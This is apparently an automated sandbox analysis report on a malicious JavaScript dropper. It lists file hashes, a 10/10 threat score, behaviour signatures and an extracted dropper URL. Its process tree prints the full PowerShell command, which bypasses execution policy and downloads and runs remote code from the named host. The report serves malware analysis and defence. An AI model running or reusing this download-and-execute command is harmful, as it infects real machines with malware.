Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
05-03-2024 02:41
General
-
Target
bcb732a5f458d792a47f2bd444d0c48d266db721f01450c539719a1e37653a13.js
-
Size
67KB
-
MD5
00de3913fd5e4bb0d9284b180bfbd956
-
SHA1
6af05b012b8c828a42acf476a5e0332aa6c4bd9d
-
SHA256
bcb732a5f458d792a47f2bd444d0c48d266db721f01450c539719a1e37653a13
-
SHA512
f47a3cdd66286792fdde690268baa1f8b8776e3c619ceccd341421e4e63bfac26554db0f7b98b9ebba559b375d50a8498727bc7771d18b207fd1bf0c4255c684
-
SSDEEP
1536:RZd77OUymTHj+bKqlqH79yuZ0aENJUWGkcXu+1LKPuJ7yNkZ7FXTh:R/aUyaHjqqH7ouZHmJUWvQEPuJ7ySZ7n
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\bcb732a5f458d792a47f2bd444d0c48d266db721f01450c539719a1e37653a13.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB